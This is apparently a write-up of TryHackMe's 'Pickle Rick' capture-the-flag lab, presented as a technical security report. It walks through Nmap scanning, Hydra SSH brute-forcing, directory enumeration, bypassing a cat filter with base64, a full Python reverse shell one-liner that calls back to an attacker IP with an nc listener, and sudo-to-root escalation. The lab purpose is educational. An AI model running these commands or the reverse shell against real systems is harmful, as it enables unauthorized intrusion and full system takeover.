Technical Report
Detailed analysis for technical teams, covering methodologies, tools, and findings.
Technical Security Report: "Pickle Rick" System
Purpose of the Report
This report documents a simulated security assessment conducted on the "Pickle Rick" system from TryHackMe. The objective was to identify and exploit vulnerabilities, demonstrate potential attack paths, and highlight key areas for security improvement.
Methodology
The assessment was executed using a structured approach:
Reconnaissance: Identifying open ports and services via Nmap.
Enumeration: Analyzing web pages and source code to gather user credentials and hidden information.
Exploitation: Leveraging brute-force techniques, directory enumeration, and command execution to gain further access.
Privilege Escalation: Establishing a reverse shell and escalating privileges to achieve root access.
Detailed Findings
1. Initial Reconnaissance
Tool Used: Nmap
Command Executed:
sudo nmap -F -T5 -sCV <target_ip>
Results: Two open ports were identified:
Port 80: HTTP service.
Port 22: SSH service.
Impact: The discovery of these ports set the foundation for further targeted testing.
2. Web Service Analysis
Procedure:
Visited
http://<target_ip>:80
, revealing a message from Rick requesting help due to a forgotten password.Examined the page source (via Ctrl+U or using
curl http://<target_ip>
) which exposed the username R1ckRul3s.
Impact: The extraction of the username provided a critical credential for subsequent authentication attempts.
3. SSH Brute-Force Attempt
Tool Used: Hydra
Command Executed:
hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>
Results: The SSH service did not support password authentication.
Impact: This method was abandoned in favor of web-based enumeration.
4. Directory Enumeration and Admin Login
Tool Used: Dirbuster
Procedure:
Ran Dirbuster to enumerate directories on the HTTP service.
Discovered that accessing
/portal.php
redirected tologin.php
, an administrative login page.
Authentication Attempts:
Tried common passwords (e.g., Password123, admin, root) with no success.
Reviewed the
robots.txt
file, which revealed a potential password.Result: The discovered password allowed successful login to the admin panel.
Impact: Gaining access to the admin interface provided an in-browser terminal for command execution.
5. Command Execution and File Discovery
Procedure:
Executed commands (
whoami
,ls -la
) via the admin terminal.Identified a file named
Sup3rS3cretPickl3Ingred.txt
.The
cat
command was blocked; instead, the file was read using:base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
Results: Successfully retrieved the contents (first secret ingredient).
Impact: Obtaining the first ingredient validated the ability to execute system commands.
6. Establishing a Reverse Shell
Preparation:
Verified Python 3 availability with
python3 --version
.Employed the reverse shell script from Pentestmonkey.
Commands Executed:
On the Attacker Machine:
nc -lnvp 8888
On the Target (via the admin terminal):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Result: An interactive reverse shell was established.
Impact: The reverse shell provided a robust foothold, facilitating deeper system exploration.
7. Privilege Escalation to Root
Procedure:
Tested for sudo access; executing:
sudo /bin/bash
Result: Obtained root-level access.
Impact: Full system control was achieved, allowing unrestricted enumeration and file access.
8. Final Enumeration and Retrieval of Remaining Ingredients
Procedure:
Enumerated the root home directory to locate additional secret ingredients.
Read the file
3rd.txt
to retrieve another ingredient.Inspected
/home
to identify therick
user's directory, which contained the final secret ingredient.
Impact: All required ingredients were successfully retrieved, completing the challenge.
Conclusion
The assessment of the "Pickle Rick" system showcased a methodical exploitation process—from initial reconnaissance and web-based enumeration to reverse shell establishment and privilege escalation. The successful extraction of all secret ingredients highlights vulnerabilities such as exposed administrative interfaces, weak authentication, and inadequate command restrictions. This exercise underscores the importance of robust service configurations, strong authentication practices, and continuous security monitoring to mitigate potential risks.
Last updated